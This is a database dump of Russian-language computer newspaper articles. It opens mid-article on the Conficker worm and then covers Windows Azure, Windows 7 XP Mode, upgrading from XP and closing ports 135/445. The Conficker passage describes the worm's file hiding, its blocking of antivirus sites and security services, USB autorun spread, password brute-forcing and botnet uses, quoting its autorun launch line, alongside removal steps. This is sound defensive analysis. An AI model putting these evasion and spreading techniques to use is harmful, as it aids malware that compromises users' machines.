/>систем за 4 дня активной жизни червя видна на рисунке 2. Наиболее<br />пострадали операционные системы<br />Windows XP SP1 и более ранние<br />версии. Чуть меньше пострадали<br />системы Winsows XP SP2 и выше. Нажмите для Что же делает червь, когда попадает<br />на компьютер потенциальной<br />жертвы? Идем далее.<br />В тылу врага<br />При попадании копии червя на ПК,<br />зловред первым делом копирует себя в стандартные системные папки,<br />причем имя файла всегда разное:<br />• %System%\[Random].dll<br />• %Program Files%\Internet Explorer<br />\[Random].dll<br />• %Program Files%\Movie Maker \[Random].dll<br />• %All Users Application Data%<br />\[Random].dll<br />• %Temp%\[Random].dll<br />• %System%\[Random].tmp<br />• %Temp%\[Random].tmp Причем всем этим файлам вирь<br />присваивает дату создания и<br />изменения, взятую из системного<br />файла %System%\kernel32.dll, что<br />исключает возможность поиска<br />недавно созданных файлов. Далее червь блокирует доступ к сайтам<br />разработчиков антивирусного ПО,<br />например, f-secure.com, drweb.com,<br />kaspersky.ru, вследствие чего<br />пользователь не может скачать<br />утилиты, необходимые для удаления червя, или просто получить<br />техническую помощь у специалистов<br />компании. Помимо этого вирус в<br />обязательном порядке отключает<br />внутренние службы Windows:<br />автоматическое обновление (Windows Update), отчеты об ошибках<br />(Windows Error Reporting), Центр<br />Безопасности Windows (Windows<br />Security Center) и Windows Defender.<br />Тем самым он не дает системе<br />автоматически скачать и установить заплатки, что делает жизнь червя<br />продолжительной и продуктивной.<br />Кончено остается ручной способ, но и<br />тут разработчики малвари обошли<br />нас – Conficker перехватывает вызов<br />API функций отвечающих за работу с DNS. При попытке выполнить DNS-<br />запрос браузеры используют функции<br />DNS_Query_A или DNS_Query_W,<br />которые контролируются червем. В<br />случае если юзер посмел вызвать<br />нежелательный сайт, червь попросту блокирует его. В итоге мы получаем<br />запрет на посещение ресурсов,<br />связанных с лечением ПК от вирусов,<br />антивирусных компаний, запрет на<br />скачивание антивирусных утилит и<br />обновлений. Следующим шагом в работе червя<br />является распространение. Вот тут<br />авторы вируса явно преуспели,<br />наделив свое детище довольно<br />обширным функционалом. Первым в<br />списке будет ранее оговоренная ошибка в службе Server,<br />позволяющая выполнить<br />произвольный код. О ней я писал<br />выше, поэтому останавливаться не<br />буду, а лишь добавлю интересную<br />особенность – для того, чтобы быстрее распространяться, вирус<br />делает небольшую поправку в<br />реестре, значительно увеличивая<br />количество возможных TCP-<br />подключений. И в обязательном<br />порядке делает невозможным использовать данную уязвимость<br />другими особями, путем перехвата<br />вызова функции<br />NetpwPathCanonicalize. Вторым<br />способом размножения стал<br />банальный и уже всем поднадоевший способ репликации<br />через USB-накопители. При этом<br />вирус в виде переименованной DLL-<br />библиотеки, сохраняется в папке<br />RECYCLER. Не помешало бы заметить,<br />что файл Autorun.inf хорошо обфусцируется червем, дабы<br />слабенькие сигнатурные сканеры не<br />смогли распознать заразы. И когда<br />уже придет мощная эвристика на<br />смену сигнатурам?? На рисунке 3<br />можно увидеть код файла Autorun.inf, созданного Conkicker. Нажмите для Запуск копии осуществляется<br />командой «Open=rundll32.exe .<br />\RECYCLER\[случайное имя].vmx».<br />Кроме всего этого, червь реализует<br />P2P механизм обмена обновлениями,<br />что позволяет ему рассылать обновления удалённым копиям,<br />минуя управляющий сервер. Как и<br />огромное число других червей,<br />Conficker так же ведет поиск<br />компьютеров с открытым доступом к<br />ADMIN$ или защищенным простыми паролями. Для этого вирус вызывает<br />системную функцию NetServerEnum<br />для поиска компьютеров в сети.<br />После того, как червь получит список<br />пользователей, он начинает брутить<br />их используя пассы из небольшого и заранее составленного<br />разработчиками списка. Кусочек<br />такого списка виден ниже на рисунке<br />4: Нажмите для А так же пытается подобрать пароли<br />вида «имя пользователя», «имя<br />пользователя наоборот», «имя<br />пользователя»+ «имя пользователя»<br />и тому подобные комбинации. Если<br />атака удалась, вирус создает на удаленном компьютере свою копию<br />опять же под случайным именем и<br />расширением. Затем там же создается<br />ежедневное задание для<br />Планировщика, с помощью которого<br />и запускается вирус по следующему принципу – rundll32.exe [random<br />filename].[random extension],<br />[random]. Как вы должны были<br />заметить – ничего нового в способах<br />распространения нет, однако каков<br />результат! А для чего все это создавалось? На этот вопрос<br />постараюсь ответить дальше.<br />Задание выполнено<br />Для чего же можно использовать<br />столь огромный бот-нет?? О, ну тут<br />пределом может стать только ваша фантазия. Задачи могут быть разными<br />– от банального распространения<br />спама, автокликинга и продажи<br />трафика, до мощнейших DDoS атак и<br />распространения опасных<br />вредоносных программ. На этой зомби-сети можно поднять очень<br />большие деньги. Многие<br />антивирусные компании<br />прогнозировали, что запуск бота<br />произойдет 1 апреля 2009 года,<br />однако они ошиблись. Чуть позже уже зараженные машины начали<br />проявлять активность, путем<br />загрузки вредоносного кода,<br />известного под именем Waledac.<br />Также большую популярность<br />получили загрузки лже-антивирусов. Что будет дальше? Остается только<br />гадать, хотя прогнозы не<br />утешительные: падение Интернета и<br />тому подобная чепуха. Лично я и мои<br />товарищи аналитики из SASecurity gr.<br />Не считаем, что это произойдет по одной, но весомой причине – червь<br />попросту прекратит сове<br />существование. У него отпадет<br />возможность реплицировать, качать<br />из И-нета всякую гадость,<br />генерировать домены и вообще он перестанет более быть бот-нетом.<br />Так что авторам червя не выгодно<br />производить перегрузку каналов. А<br />для того, чтобы этого вообще не<br />произошло, даже если кто-то<br />захочет, надо бы удалить червя со своего ПК или ежели его еще у вас<br />нет, просто обезопасить себя. Как это<br />сделать, читаем далее.<br />Профилактика и лечение заразы<br />Многие источники – СМИ и<br />специалисты по информационной безопасности – уверяют, что<br />полностью обезопасить систему от<br />проникновения Conficker нельзя.<br />Специалисты из SASecurity gr.<br />опровергают это мнение, и лично я<br />хочу привести вам отличный способ, который поможет иммунизировать<br />систему. Первое, что вы должны<br />сделать – убедиться, что ваш ПК еще<br />не заражен. Это можно сделать,<br />посетив какую-нибудь страничку<br />антивирусной компании, вроде Kaspersky.ru. Если вам это не удалось<br />– это может быть первым симптомом.<br />Вторым является большое<br />количество открытых портов. В этом<br />случае советую вам лечиться, как<br />укажу ниже, а пока только об иммунизации. Так вот, если же в<br />системе червя еще нет, первое что<br />надо сделать – скачать патч для<br />службы Server – бюллетень MS08-067<br />и установить его. Сделать это можно<br />по ссылке http://www.microsoft.com/ technet/security/Bulletin/<br />MS08-067.mspx. Для максимальной безопасности<br />лучше было бы вообще отключить<br />эту службу, но это советую делать<br />только, если вы уверены, что она вам<br />не понадобится. Далее следует в<br />обязательном порядке запретить автозапуск на съемных носителях и<br />жестких дисках (на CD и DVD дисках я<br />пока еще не видел подобного).<br />Информацию по отключению<br />автозапуска можно найти в<br />предыдущих номерах компьютерной газеты или в интернете. Третьим<br />шагом на нашем пути станет<br />установка антивирусного ПО и<br />сетевого экрана, если таковых еще<br />не имеется. В обязательном порядке<br />следует обновить антивирусные базы. Четвертый шаг – отключение<br />службы «Планировщика заданий»,<br />уверен, что вы его даже не<br />используете. И последним, пятым,<br />шагом станет установка<br />качественного и сложного пароля на систему. Не банальный, вроде<br />«pass112», а действительно хороший,<br />в стиле «R8#lUq2EfgC$». Вот и все! Все<br />эти действия закроют основные<br />каналы распространения червя и<br />помогут защитить систему от заражения.<br />Если же Вы уже заражены, то<br />следуйте следующей инструкции:<br />1. Удалить ключ из системного<br />реестра – HKLM\SYSTEM<br />\CurrentControlSet\Services\netsvcs. 2. Удалить строку «%System%<br />\<rnd>.dll» из следующей записи<br />реестра:<br />[HKLM\SOFTWARE\Microsoft\Windows<br />NT\CurrentVersion\SvcHost] «netsvcs».<br />3. Перезагрузить ПК 4. Удалить оригинальный файл<br />червя, где его искать – смотрите<br />описание способов заражения<br />компьютеров из «В тылу врага».<br />Делать это советую в Total<br />Commander с включенной опцией «Показывать скрытые/системные<br />файлы».<br />5. Со всех съемных носителей удаляем<br />копии червя и файлы Autorun.inf<br />(имена и расположение копий можно<br />как раз посмотреть в этом файле). 6. Теперь попросите у друга или<br />найдите на дисках утилиту Dr.Web<br />CureIt и просканируйте вашу систему<br />на наличие зловредов. Желательно,<br />чтобы это была последняя версия<br />программы со всеми обновлениями. 7. На всякий случай можно<br />ребутиться.<br />8. Пересоздать или удалить файл<br />hosts из system32\drivers\etc. Это<br />позволит вновь обращаться к<br />разнообразным ресурсам в сети, вроде сайтов антивирусных<br />компаний.<br />Это ручной способ удаления Conficker.<br />Есть, конечно, еще и<br />автоматизированные способы, вроде<br />разнообразных утилит от Symantec, F- Secure и так далее, но все же лучше<br />это делать самому. Тем более, что мы<br />не имеем доступа к этим утилитам из-<br />за активного зловреда<br />Заключение<br />Вот так вот обычный червь с простыми и давно известными, но<br />отлично продуманными фишками<br />поразил весь свет. Удручает то, что и<br />до сих пор, начиная с октября 2008<br />года, существует реальная угроза<br />заражения, а вирус продолжает распространяться. Специалисты<br />компании Symantec заявляют о том,<br />что вредоносная программа Conficker<br />продолжает распространяться с<br />высокой скоростью и в настоящее<br />время ежедневно инфицирует до 50 тысяч компьютеров. Обидно, что<br />многие крупные компании не смогли<br />противостоять опасности вовремя. И<br />даже сейчас не могут нормально<br />помочь пользователям справиться с<br />заразой. Но самое интересное то, что за достоверную информацию об<br />авторах вредоносной программы<br />предлагается награда в размере 250<br />тысяч долларов. Такие немаленькие<br />деньги предлагает компания<br />Microsoft. Так что, если вы располагаете какой-либо<br />информацией, обращайтесь к<br />мелкомягким за зелеными, только<br />смотрите, как-бы вместо награды вас<br />самих не приобщили к делу !","Чума для Windows: история одного<br />червя","gazeta/img_957886.png","1375056896","4");
INSERT INTO gazeta_article VALUES("108","19","Затронув тему новых операционных<br />систем и рассказав вам про Google<br />Chrome OS я просто не мог обойти<br />вниманием еще одну новую ОС,<br />которую осенью представила миру<br />компания Microsoft. Особенность этой операционной системы заключается в<br />том, что она является облачной (in-<br />the-cloud) и служит для создания веб<br />приложений, которые работают в<br />режиме облачных вычислений и<br />опираются на серверы майкрософта. Как я уже говорил в статье об<br />облачных антивирусах, с последние<br />время облачные вычисления стали<br />очень модными, хотя и имеют ряд<br />крупных минусов. Например,<br />зависимость приложения от сервера и от пропускной способности<br />подключения к интернету. Но и<br />плюсов у облачных вычисления<br />хватает, как пример можно привести<br />снятие нагрузки с процессора вашего<br />компьютера при выполнении различных операций. Но вернемся к<br />новой ОС от Microsoft.<br />В этой статье я подробнее расскажу о<br />том, что же из себя представляет<br />WinAzure и опишу пример создания<br />приложения, который был описан бета-тестером, известным в сети как<br />gefix, на своем блоге хабрахабр.<br />Немного о Windows Azure<br />Windows Azure – именно так<br />называется облачная операционка.<br />Основана она на Windows Server. Впервые Стив Балмер анонсировал<br />Azure в начале октября 2008 года,<br />после в конце октября демонстрацию<br />продукта провел Рэй Оззи,<br />исполнительный директор компании.<br />Как выразился Рэй, компания Microsoft получила огромный опыт в<br />сфере веб-приложений за годы<br />работы ее проектов и ресурсов.<br />Система работает в составе Azure<br />Services Platform, которая изначально<br />поддерживает Windows .NET Framework и Visual Studio. Однако,<br />кроме стандартных для майкросовт<br />библиотек и платформ разработки<br />приложений имеется и поддержка<br />сторонних языков, Python, php, Eclipse<br />и т.д., что делает Azure более гибкой для разработчиков. Поддержка<br />популярных протоколов, таких как<br />XML или SOAP позволит создать более<br />удобные приложения. Согласитесь,<br />что по нынешним меркам как-то<br />диковато видеть в сети ресурс, у которого нет хотя бы одного feed’а,<br />rss и atom – явление не просто<br />привычное, а требуемое (рис.1). Нажмите для Платформа Azure Services Platform, с<br />корой работает операционка, в своем<br />составе имеет пять основных<br />подсистем. ОС Windows Azure<br />необходима для управления сетями,<br />приложениями и дисковым пространством. Microsoft SQL Services<br />обрабатывает и хранит данные<br />пользователя. Microsoft .NET Services<br />поддерживает расширения .NET, Live<br />Services и занимается контролем<br />приложений, синхронизацией, хранением документов, фото и других<br />файлов. Microsoft SharePoint Services и<br />Microsoft Dynamics CRM Services будут<br />предоставляться для биснес-<br />пользователей и предназначены для<br />организации совместной работы над проектами и управления<br />взаимоотношениями с клиентами.<br />Естественно сервис облачных<br />вычислений от Microsoft будет стоить<br />денег. Вид оплаты, собственно, мало<br />отличается от оплаты простого хостинга, т.е. абонентская плата.<br />Сумма абонентской платы будет<br />рассчитываться относительно трех<br />факторов: вычислительная мощность<br />сервера, дисковое пространство,<br />объем трафика. Создание приложения<br />Теперь я хотел бы рассмотреть<br />пример создания веб-приложения,<br />описанный на одном из блогов<br />хабрахабр.<br />При работе с Azure сервисом имеются определенные ограничения:<br />• Общее время вычислений: 2000<br />часов (? 83 дня в режиме 24/7)<br />• Объем хранилища: 50 Гб<br />• Максимальный трафик хранилища:<br />20 Гб/день После регистрации у автора<br />появилась возможность создать два<br />вида компонентов (рис.2):<br />• Storage Account — распределенное<br />хранилище для больших объемов<br />структурированной и неструктурированной информации,<br />• Hosted Services — 64-битное<br />вычислительное облако Azure<br />Services Platform, которое и является<br />хостингом для облачных<br />приложений. Нажмите для Описывается создание хостинга<br />изображений. Для выполнения<br />подобной задачи необходимо одно<br />облако и одно хранилище данных.<br />Для того, чтобы работать с Windows<br />Azure в Visual Studio 2008 необходимо установить два компонента:<br />• Windows Azure SDK (7.3 MB)<br />• Windows Azure Tools for Microsoft<br />Visual Studio (1.3 MB)<br />Для создания хостинга использовался<br />один из примеров, которые имеются в компоненте SDK. Проект<br />StorageClient, который так же имеется<br />в SDK, был подключен к сервису как<br />Reference. StorageClient позволяет<br />легко работать с хранилищем.<br />Код загрузки данных, для Blob- хранилища имеет такой вид:<br />// Получаем доступ к хранилищу по<br />данным в конфигурационном файле<br />BlobStorage blobStorage =<br />BlobStorage.Create(StorageAccountInfo.<br />GetDefaultBlobStora geAccountFromConfiguration());<br />// Создание нового контейнера<br />"photogallery" с публичными правами<br />BlobContainer blobContainer =<br />blobStorage.GetBlobContainer<br />("photogallery").CreateContainer(null, ContainerAccessControl.Public);<br />// Свойства контейнера<br />BlobProperties props = new<br />BlobProperties<br />("NameOfFileInContainer")<br />{ ContentType = upload.PostedFile.ContentType };<br />// Загрузка данных в контейнер<br />blobContainer.CreateBlob(props, new<br />BlobContents(upload.FileContent), true);<br />После того, как в Visual Studio были<br />установлены выше указанные тулсы, появились новые типы проектов,<br />которые можно создать (рис.3).<br />Далее необходимо создать Worker<br />Cloud Service, который будет<br />функционировать непосредственно в<br />облаке и генерировать превьювы для изображений. Шаблон кода его<br />класса имеет вид:<br />public class WorkerRole : RoleEntryPoint<br />{<br />public override void Start()<br />{ // This is a sample worker<br />implementation. Replace with your<br />logic.<br />RoleManager.WriteToLog("Information",<br />"Worker Process entry point called")<br />;while (true) {<br />Thread.Sleep(10000);<br />RoleManager.WriteToLog("Information",<br />"Working");<br />}<br />}public override RoleStatus GetHealthStatus()<br />{<br />// This is a sample worker<br />implementation. Replace with your<br />logic.<br />return RoleStatus.Healthy; }<br />} Нажмите для Далее необходимо подключить код к<br />проекту Reference с классами работы<br />с хранилищем<br />(Microsoft.Samples.ServiceHosting.<br />StorageClient) (рис.4). Код сервиса,<br />если он вам интересен, можно найти тут http://tinyakov.net/Files/ CloudService1.htm. Нажмите для После написания кода наступает<br />момент публикации (рис.5). После<br />выбора опции публикации создаются<br />два файла для загрузки – сам пакет с<br />кодом сервиса и файл конфигурации,<br />в котором указано количество узлов для сервиса (рис.6). Вся процедура<br />регистрации включает в себя два<br />этапа: загрузка проекта в Staging для<br />проверки и перевод проверенного<br />проекта в Production. После<br />публикации получаем вид сервиса как на рисунке 7. Нажмите для Нажмите для Сервис есть, хранилище тоже,<br />остается только оболочка. Автор<br />решил вопрос одной страницей на<br />aspx (http://tinyakov.net/Files/ Default.aspx.htm;<br />http://tinyakov.net/Files/<br />Default.aspx.cs.htm ), которую разместил на хостинге от<br />masterhost’а. Конечно размещение<br />оболочки можно было поручить и<br />облаку. На странице размещена одна<br />UpdatePanel, на которой содержится<br />ContentTemplate с ссылками- превьюшками. Дальше начался<br />процесс тестирования, который<br />представляется в виде графиков<br />нагрузки (рис.8), которые автор<br />периодически меняет. Если вам<br />интересно проследить данный процесс тестирования, то ссылку<br />блога в студию: http://habrahabr.ru/ blogs/Azure/ – тут вам необходимо найти пост «Создание облачного<br />приложения».<br />Кроме того, если имеется желание<br />лично протестировать возможности<br />Windows Azure, то опять же ссылку в<br />студию: http://www.microsoft.com/ azure/register.mspx - тут вы сможете зарегистрироваться<br />для тестирования облачной<br />операционки.<br />Заключение<br />Если немного остановиться на<br />востребованности данного сервиса, то тут тяжело что-либо сказать.<br />Единственная область, где Windows<br />Azure может использоваться, на мой<br />взгляд – бизнес. Обычному<br />пользователю не понадобятся<br />подобные услуги. Хотя, скорее всего Microsoft и делала ставку на нужды<br />компаний. Это все, что я хотел вам<br />сказать на эту тему. Используйте<br />рациональные решения для ваших<br />ПК (:","Высокая облачность. Обзор ОС<br />Windows Azure и Azure","gazeta/img_647714.png","1375056976","4");
INSERT INTO gazeta_article VALUES("109","19","Так называемые проблемы<br />совместимости служат, пожалуй,<br />главным препятствием при переходе<br />пользователей на операционную<br />систему Windows 7. Многие<br />опасаются, что, как и в ситуации с Windows Vista, в новой ОС не будут<br />работать некоторые привычные<br />приложения или игры. И эти<br />опасения не беспочвенны. В ряде<br />случаев при попытке не то что<br />запустить, а просто установить «старые» программы, Windows 7<br />выдает ошибку. В связи с этим<br />повышенный интерес наблюдается к<br />так называемому режиму<br />совместимости с XP в операционной<br />системе Windows 7. Как это все работает, и что необходимо для того,<br />что бы воспользоваться данной<br />функцией, постараемся выяснить в<br />этой статье.<br />Режим Windows XP Mode в Windows 7<br />работает на основе технологии Microsoft Enterprise Desktop<br />Virtualization, сокращенно – MEDV,<br />или по-народному – «медвед». Эта<br />технология была разработана<br />Microsoft специально для решения<br />проблем совместимости, возникающих у старых приложений<br />при работе в новых версиях Windows.<br />Проще говоря, «медвед» помогает<br />пользователям устанавливать и<br />запускать те приложения, которые<br />нормально работают в XP, но по каким-то причинам отказываются<br />работать в Windows Vista, или в<br />нашем случае – в Windows 7.<br />Для того что бы решить данную<br />проблему, в системе устанавливается<br />виртуальная машина Windows Virtual PC , эмулирующая работу<br />операционной системы Windows XP.<br />При этом все инсталлированные<br />приложения впоследствии можно<br />запускать как бы из Windows 7 в<br />автоматическом режиме без необходимости запуска самой<br />виртуальной машины. Изначально<br />Windows 7 не имеет режима XP Mode,<br />поэтому пользователю предлагается<br />самостоятельно загрузить с сайта<br />Microsoft и установить виртуальную машину, а также образ системы<br />Windows XP. Сделать это можно,<br />пройдя по следующей ссылке: http:// www.microsoft.com/windows/virtual-<br />pc/download.aspx Размер обоих файлов составляет<br />около 450 Мегабайт, при этом 445<br />Магабайт приходится<br />непосредственно на образ Windows<br />XP. На диске после установки все это<br />удовольствие занимает 1,6 Гб, а для своей работы требует 256 Мб<br />оперативной памяти. Для увеличения<br />быстродействия объем памяти,<br />занимаемый под виртуальную<br />машину, можно увеличить. Однако<br />по своему опыту могу сказать, что виртуальная XP в Windows 7 работает<br />довольно шустро, то есть<br />выделяемой по умолчанию памяти<br />будет вполне достаточно. Перед<br />началом загрузки необходимо<br />выбрать тип процессора (32, или 64 бит), и язык виртуальной системы.<br />Русскоязычного образа Windows XP<br />для работы в режиме XP Mode на<br />сайте Microsoft, к сожалению, пока<br />нет. Впрочем, это далеко не<br />единственная проблема, с которой может столкнуться пользователь,<br />пожелавший испробовать данную<br />технологию.<br />Дело в том, что для работы<br />виртуальной машины с Windows XP в<br />среде Windows 7 необходима так называемая аппаратная поддержка<br />визуализации. Фактически, «железо»<br />компьютера должно поддерживать<br />технологии Intel VT или AMD-V,<br />которые также должны быть<br />включены в BIOS. Для проверки способности рабочей станции<br />поддерживать работу Windows Virtual<br />PC Microsoft советует воспользоваться<br />специальными утилитами, которые<br />можно скачать здесь: http://microsoft.com/windows/virtual-<br />pc Можно поступить и по-другому, а<br />именно – скачать виртуальную<br />машину и образ системы Windows XP,<br />затем попробовать их установить и<br />запустить режим XP mode. Если ваше<br />железо не соответствует необходимым требованиям, ничего<br />страшного не произойдет.<br />Виртуальная машина просто выдаст<br />ошибку и не запустится. Нажмите для Итак, предположим, что проблем у<br />вас не возникло, или вы их успешно<br />решили, после чего у вас все<br />заработало. Это хорошо. Потому что<br />дальше уже все гораздо проще.<br />Virtual PC для Windows 7 не является автономным программным продуктом<br />и при установке встраивается в<br />систему наподобие браузера Internet<br />Explorer. Ярлыки на виртуальную<br />Windows XP можно будет найти через<br />меню Пуск – Программы. Именно там должен появиться раздел Windows<br />Virtual PC, а в нем пункт Virtual<br />Windows XP. При первом запуске<br />виртуальная машина запросит<br />пароль, который пользователь<br />выбирает самостоятельно. Дальше на вашем компьютере в виртуальном<br />режиме загружается обычная,<br />«чистая» Windows XP с минимальным<br />набором функций и приложений,<br />таких как проигрыватель Windows<br />media, почтовая программа Outlook Express, и браузер Internet Explorer. Нажмите для С ней теоретически можно работать,<br />как с обычной операционной<br />системой. Устанавливать, удалять<br />приложения, запускать их, работать с<br />ними, и т.д. Иллюзия Windows XP<br />создается полная. А если еще и развернуть окно виртуальной<br />машины в полноэкранный режим, то<br />заработавшись, можно и забыть о<br />том, что мы на самом деле находимся<br />в Windows 7.<br />Но, как уже отмечалось в начале этой статьи, для работы с<br />приложениями системы Windows XP<br />каждый раз запускать виртуальную<br />машину вовсе необязательно. В<br />настройках Virtual PC есть<br />специальный пункт, так называемый Auto Publish. По умолчанию эта<br />функция включена. Это означает, что<br />все приложения, установленные в<br />виртуальной Windows XP будут<br />автоматически публиковаться в<br />стартовом меню Windows 7. Но это будут не просто ярлыки потому, что<br />по ним можно будет запускать<br />программы, установленные в<br />виртуальной среде, без<br />предварительного запуска<br />непосредственно самой виртуальной машины. При попытке запустить<br />установленное в виртуальной среде<br />приложение, система, конечно же<br />будет подгружать Virtual PC, но это<br />будет происходить, если можно так<br />выразиться, в фоновом режиме. В результате, в случае удачной<br />установки виртуальной машины, на<br />нее можно инсталлировать все<br />необходимые, но не работающие в<br />Windows 7 приложения, после чего о<br />самой виртуальной системе Windows XP можно вообще забыть. И<br />вспоминать о ней разве что тогда,<br />когда эти самые приложения надо<br />будет либо установить, либо удалить.<br />Такая себе удобная интеграция. Как<br />нетрудно догадаться, она будет весьма полезна на предприятиях, где<br />имеется большой парк компьютеров,<br />и соответственно, большое<br />количество не слишком опытных<br />пользователей.<br />Кроме того, виртуальная Windows XP «видит» флешки и другие usb-<br />устройства, может работать с<br />принтерами. И все было бы хорошо,<br />если бы не проблема с играми,<br />которые, к сожалению, вполне могут<br />«не пойти» как в Windows 7, так и в виртуальной Windows XP. Несмотря<br />на то, что Microsoft задекларировал<br />наличие в ее образе всех<br />необходимых драйверов, очень<br />может быть, что для воскрешения<br />любимой игры вам придется в виртуальной машине Windows XP<br />переустанавливать DirectX или<br />обновлять драйвера для<br />видеокарты. Причем, даже после<br />этих манипуляций успешный<br />результат не гарантирован, поскольку «виртуальная машина XP»<br />в случае с играми ведет себя очень<br />загадочно. Например, в ней могут не<br />работать даже те игры, которые,<br />пусть и с глюками, запускаются и<br />работают безо всяких эмуляций, просто в Windows 7. В целом,<br />приходится констатировать тот факт,<br />что Microsoft, в данном случае хотела<br />сделать, как лучше, но проблемы с<br />установкой и работой режима XP<br />mode в Windows 7, тем не менее, возникают, как всегда..","Возможное решение… Windows XP<br />Mode в Windows 7","gazeta/img_369216.png","1375057086","4");
INSERT INTO gazeta_article VALUES("110","19","Новая ОС Windows 7 выходит в<br />октябре. В связи с этим релизом у<br />многих пользователей возникают<br />множество вопросов и сомнений.<br />Стоит ли менять проверенную<br />Windows XP? А если Windows 7 разочарует так же, как и Windows<br />Vista? Ниже приведены семь причин,<br />которые убедительно доказывают<br />необходимость перехода на Windows<br />7.<br />Сайт Internetua.com передает мнение обозревателей Wired. Они советуют<br />сомневающимся пользователям<br />задать себя ряд вопросов:<br />Действительно ли стоит пользовать<br />ОС, которая уже 8 лет на рынке?<br />Неужели мне не нужна лучшая система? Неважно, насколько<br />привычна и удобна Windows XP –<br />нельзя отказываться от нового<br />поколения технологий, зацикливаясь<br />на устаревших версиях и не пробуя<br />что-то новое. Вот 7 причин, по которым пользователи Windows XP<br />должны перейти новую ОС.<br />1. Пользователи просили выпустить<br />более совершенную и удобную<br />замену Windows Vista. Несомненно, у<br />Vista есть масса противников – многие пользователи, протестировав ее,<br />решили вернуться к Windows XP. Эта<br />тенденция побудила Microsoft<br />активизировать разработку новой ОС.<br />Выпуск в январе этого года пробной<br />версии Windows 7 стал грамотным шагом, который помог компании<br />собрать мнение пользователей о<br />новой операционной системе и<br />проверить их отношение к новинке.<br />В целом, система приглянулась<br />«адептам» Windows XP, которые признали, что новая ОС содержит<br />много изменений, позволяющих<br />взглянуть по-новому на продукты<br />Microsoft.<br />2. Обновление операционной<br />системы учитывает приверженность пользователей к XP. Создавая новую<br />версию ОС, Microsoft думала о<br />лояльных клиентах, которые не<br />должны быть разочарованы после<br />Windows XP. Windows 7 будет<br />поддерживать все приложения, которые работают в Windows XP.<br />Даже в том случае, если приложение<br />на запустится в новой ОС,<br />пользователь сможет его запустить в<br />виртуальной среде XP Mode, которая<br />представляет собой режим запуска программ, работающих в Windows XP.<br />Разработчики предусмотрели<br />вариант, при котором запуск такого<br />приложения не потребует<br />переключения режимов – все<br />программы внешне будут работать в среде Windows 7. Кроме того,<br />компания намерена выпустить еще<br />до релиза новой ОС инструменты<br />проверки совместимости программ с<br />Windows 7.<br />3. В новой ОС драйвера для оборудования, которое<br />подключается к компьютеру, станут<br />устанавливаться в автоматическом<br />режиме. Пользователей избавят от<br />необходимости поиска в Сети<br />подходящих драйверов и их установки.<br />4. Windows 7 – пиратский рай для<br />любителей транслировать<br />медиаконтент на современный и<br />большой телевизор с модулем Wi-Fi<br />или на подключенную к нему игровую консоль. Если пользователи<br />Mac вынуждены покупать контент в<br />интернет-магазине iTunes и<br />транслировать его на большой экран<br />только через Apple TV, то в Windows 7<br />этот процесс будет значительно упрощен. Тут не требуется установка<br />лицензионного приложения и<br />устройства, которое будет<br />гарантировать совместимость<br />телевизора и компьютера.<br />Проигрыватель Windows Media Player будет подключаться к Xbox,<br />телевизору с модулем Wi-Fi и любому<br />UPnP-совместимому устройству,<br />гарантировано транслируя фильмы,<br />музыку и картинки. Обмен контентом<br />также упрощен с помощью технологии HomeGroup, которая<br />позволяет подключать другие<br />компьютеры к Windows 7.<br />5. Улучшенный интерфейс, который<br />делает работу с окнами более<br />приятной и легкой. Отдельно стоит отметить технологию Aero Peek,<br />которая позволяет комфортно<br />переключаться между окнами<br />запущенных программ, а также<br />технологию Aero Snap, позволяющую<br />разворачивать окна на половину экрана или на весь экран простым<br />движением мыши.<br />6. Широкая поддержка аппаратного<br />обеспечения. Так как технологии<br />развиваются с огромной скоростью,<br />совместимость с новыми версиями различных приложений необходима.<br />Она будет представлена в Windows 7.<br />В частности, в этой операционной<br />системе будет поддержка технологии<br />«multitouch», что очень кстати,<br />учитывая нарастающую популярность сенсорных экранов и<br />прогнозируемого успеха в 2010 году<br />планшетных компьютеров. Другим<br />перспективным направлением<br />являются многопроцессорные<br />компьютеры. Скорее всего, Windows XP не сможет справиться с возросшей<br />вычислительной мощностью, а<br />серверная Windows Server 2008 R2, по<br />словам представителей компании,<br />будет поддерживать до 192 ГБ<br />оперативной памяти и до 256 процессоров. Для сравнения, 32-<br />битные версии Windows 7 и Windows<br />XP видят лишь 4 Гб оперативной<br />памяти, а 64-битная Windows XP – 128<br />Гб RAM. Еще один козырь Windows 7 –<br />заявленная адаптация под нетбуки, представляющие собой маломощные<br />устройства. Благодаря<br />модернизированному принципу<br />работу с системными ресурсами и<br />оперативной памятью Windows 7<br />работает на этих устройствах даже лучше, чем Windows XP.<br />7. Более современный внешний вид.<br />Конечно, это не может быть<br />основным аргументов за переход на<br />Windows 7, но, стоит признать, что<br />пользователи зачастую ощущают себя единым целым со своим<br />компьютером, поэтому обновленный<br />внешний вид пользовательского<br />интерфейса будет приятным<br />дополнением к перечисленным выше<br />функциям.","Семь причин перейти с Windows XP<br />на Windows 7","gazeta/img_204728.png","1375057141","4");
INSERT INTO gazeta_article VALUES("111","19","135 и 445 необходимо закрыть - это<br />серьёзные дырки. Если фаером не<br />получается а это бывает то надо<br />делать следущее:<br />1. Закрываем порт 135 (Disabling<br />Distributed COM (DCOM)). Способ 1:<br />Пуск -> Выполнить и вводим<br />Dcomcnfg.exe<br />Что бы выключить DCOM, открываем<br />панель "Свойства по умолчанию" и<br />убираем галочку "Разрешить использовать DCOM на этом<br />компьютере".<br />Перезагружаемся.<br />Способ 2:<br />В ключе регистра HKEY_LOCAL_MACHINE<br />\SOFTWARE\Microsoft\Ole у параметра "EnableDCOM" , имеющего<br />значение "Y" изменить это значение<br />на "N"<br />"EnableDCOM"="N"<br />Перезагружаемся.<br />2. Закрываем порт 445 TCP/UDP (NetBT).<br />Способ 1:<br />Открываем Панель упровления -><br />Система -> Оборудование -><br />Диспетчер устройств. В меню "Вид"<br />выбираем "Показывать скрытые устройства".<br />В списке устройств появятся<br />"Драйверы устройств не Plug and<br />Play".<br />Открвыаем этот пункт, и в<br />появившемся списке открываем "NetBios через TCP/IP" -> Драйвер -> и<br />в Автозагрузка -> Тип ставим<br />"Отключено".<br />Перезагружаемся.<br />Способ 2:<br />В ключе регистра у параметра TransportBindName,<br />имеющего значение \Device\ ,<br />удаляем это значение.<br />Перезагружаемся.","Закрытие портов 135 и 445 вручную","gazeta/img_760523.png","1375057246","4");
